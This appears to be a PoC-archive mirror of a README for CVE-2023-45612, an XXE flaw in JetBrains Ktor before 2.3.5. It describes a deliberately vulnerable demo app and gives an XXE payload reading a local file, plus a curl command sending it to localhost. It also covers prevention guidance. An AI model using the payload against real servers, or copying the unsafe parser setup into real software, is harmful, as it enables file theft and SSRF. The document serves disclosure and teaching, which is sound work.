Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-45612 PoC — JetBrains Ktor 代码问题漏洞

Source
https://github.com/stefan-500/ktor-cve-2023-45612-poc
Associated Vulnerability
Title:JetBrains Ktor 代码问题漏洞 (CVE-2023-45612)
Description:JetBrains Ktor framework是捷克JetBrains公司的一款Web应用程序框架。 JetBrains Ktor 2.3.5之前版本存在代码问题漏洞,该漏洞源于ContentNegotiation默认配置存在XML外部实体注入(XXE)漏洞。
Description
Ktor XXE Injection Proof-of-Concept (CVE-2023-45612)
Readme
# Ktor XXE Vulnerability Proof-of-Concept (CVE-2023-45612)

## Summary

Impact: Arbitrary files access via a crafted XML DTD with an XXE reference.  
Root cause: Unsafe XML document parser.

This repo contains a vulnerable **Ktor 2.3.4** app configured to allow external entities so the XXE effect is visible.

## Description

Vulnerable Ktor (v2.3.4) application for XML External Entity injection (CVE-2023-45612) proof of concept.  

CVE-2023-45612 is an XXE (XML External Entity) bug in Ktor’s `ContentNegotiation` when XML is enabled in versions before `2.3.5.`  
This vulnerability maps to [CWE-611: Improper Restriction of XML External Entity Reference](https://cwe.mitre.org/data/definitions/611.html).  
XXE is a part of [OWASP Top 10 A05:2021-Security Misconfiguration](https://owasp.org/Top10/0x00_2021-introduction/#whats-changed-in-the-top-10-for-2021) risk category, but it is also an insecure design problem, since the cause is a non-restrictive XML parser. 

> Reported by Ulf Karlsson — see [Jetbrains security notes](https://www.jetbrains.com/privacy-security/issues-fixed/?product=Ktor).

## Affected components & versions

Ktor versions older than `2.3.5`

## Reproduction environment

This is my setup for reproducing the issue:

- IntelliJ IDEA [2025.2.4](https://www.jetbrains.com/idea/download/)
- Ktor 2.3.4
- JDK 21
- OS: Windows 10

## XXE explained
XML documents optionally contain a Document Type Definition (DTD), which, among other features, enables the definition of XML entities. It is possible to define an entity by providing a substitution string in the form of a URI. The XML parser can access the contents of this URI and embed these contents back into the XML document for further processing.
By submitting an XML file that defines an external entity with a file:// URI, **an attacker can cause the processing application to read the contents of a local file**.  
For example, a URI such as `"file:///c:/winnt/win.ini"` designates (in Windows) the file `C:\Winnt\win.ini`, or `file:///etc/passwd` designates the password file in Unix-based systems.  
(https://cwe.mitre.org/data/definitions/611.html)  

## How it works
A `POST` request is made to the endpoint `http://localhost:8080/xml`.  
The request sends an xml file, `exploit/payloads/xxe-demo-file.xml`, containing a `<!DOCTYPE>` element in which an external entity is referenced, `exploit/etc/secret.txt` in this case.  
> This could potentially be any other file on the system to which the process has acces to.
  
**xxe-demo-file.xml**
```xml
<!DOCTYPE Mail [ <!ENTITY xxe SYSTEM "exploit/etc/secret.txt"> ]>
<Mail><title>&xxe;</title></Mail>
```
The XML parser (configured to allow DTDs) resolves this element and retrieves the resource data.  
> The external reference could also be a path to an **SSRF endpoint**, or could point to a large file in order to occupy system's resources **(DOS)**.

## Reproduction steps
1. Run the server:  
```bash
./gradlew run
```
2. Output should be:
```bash
Responding at http://127.0.0.1:8080
```
3. Send the XXE payload using curl:
```bash
 curl -i http://localhost:8080/xml -H "Content-Type: application/xml" --data-binary @exploit/payloads/xxe-demo-file.xml
```
Expected result **(vulnerable)**:  
> Console outputs: `Received: <external entity data>`    

Expected result **(secure)**:  
> `400 Bad Request`, or similar (The XML parser blocks Document Type Definition)

## Evidence
Run command:  

![Run app command](screenshots/run_app.jpg) 

Send XXE payload using cURL, and the result displaying injected file contents:  

![Run app command](screenshots/curl_command.jpg)

## Severity
Severity is **high/critical**. Potential local file retrieval, SSRF attack, DoS attack, or other system impacts.  
NVD Base Score: `9.8 CRITICAL` (CVSS v3) (https://nvd.nist.gov/vuln/detail/CVE-2023-45612)

## Prevention guidelines draft for developers
- Configure the XML parser to not resolve external entities. If external entities are needed, implement a custom XmlResolver with a request timeout, data retrieval limit, and restrict resources it can retrieve locally.
- Use resources like the [OWASP XXE Prevention cheat sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html), which covers XXE prevention implementation, specifically for various technologies.  
- Integrate SAST into CI, since it can find some instances of this weakness by analyzing source code.
- Track and analyze dependency versions and vulnerabilities.
- Implement secure coding standards at company level.
- Emphasize the integration of security throughout the SDLC, especially in the design and developer testing phases.

## References
- https://nvd.nist.gov/vuln/detail/CVE-2023-45612
- https://cwe.mitre.org/data/definitions/611.html
- https://capec.mitre.org/data/definitions/221.html
- https://medium.com/@iason.tzortzis/xxe-xml-external-entity-injection-explained-e8be5f1f7cd7
- https://ktor.io/docs/server-create-a-new-project.html#create-project-with-the-ktor-project-generator
- https://www.jetbrains.com/privacy-security/issues-fixed/?product=Ktor
- https://ktor.io/docs/2.3.13/welcome.html
- https://portswigger.net/web-security/xxe#exploiting-xxe-to-retrieve-files
- https://ssojet.com/parse-and-generate-formats/parse-and-generate-xml-in-ktor/
- https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
- https://owasp.org/Top10/A05_2021-Security_Misconfiguration/
File Snapshot

 [4.0K]  /data/pocs/ecea89cc24856e3a48d7ba5ef0b6a83d95139a34
├── [1.0K]  build.gradle.kts
├── [4.0K]  exploit
│   ├── [4.0K]  etc
│   │   └── [  43]  secret.txt
│   └── [4.0K]  payloads
│       └── [  99]  xxe-demo-file.xml
├── [4.0K]  gradle
│   ├── [1.0K]  libs.versions.toml
│   └── [4.0K]  wrapper
│       ├── [ 44K]  gradle-wrapper.jar
│       └── [ 252]  gradle-wrapper.properties
├── [  27]  gradle.properties
├── [8.4K]  gradlew
├── [2.7K]  gradlew.bat
├── [5.3K]  README.md
├── [4.0K]  screenshots
│   ├── [ 30K]  curl_command.jpg
│   └── [ 45K]  run_app.jpg
├── [ 129]  settings.gradle.kts
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  kotlin
        │   ├── [1001]  Application.kt
        │   ├── [ 101]  Mail.kt
        │   └── [ 428]  Routing.kt
        └── [4.0K]  resources
            ├── [ 148]  application.yaml
            └── [ 425]  logback.xml

11 directories, 18 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.